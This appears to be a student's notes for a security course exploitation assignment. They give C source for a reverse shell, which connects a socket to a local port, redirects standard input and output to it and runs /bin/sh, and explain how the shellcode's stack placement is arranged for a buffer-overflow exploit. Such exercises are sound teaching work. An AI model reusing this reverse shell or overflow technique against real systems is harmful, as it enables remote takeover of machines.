shellcode documentation: 
most of the shellcode was taken from ida when reverse engeneering the following c:

int main(int argc, char *argv[])
{
    int sockfd = 12345;
    struct sockaddr_in serv_addr; 
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_port = htons(1337); 
    serv_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    dup2(sockfd,1);
    dup2(sockfd,0);
    connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) ;
    printf( "%s\n", strerror(errno));
    execv("/bin/sh", 0);
}
at the beginig i moved ebp to esp's old location in order to free space for varibales that the program would need
(i left about 30 bytes of space by placing the shellcode correctly) without overriding our shellcode.
Also i decreased esp by much in order that actions like "push" wouldnt override our code.

python documentation: (there are notes in q2.py file)
The code is simmilar to the privious assignment,but this time we fix the end of the shellcode location to be 34 bytes before the return address location. 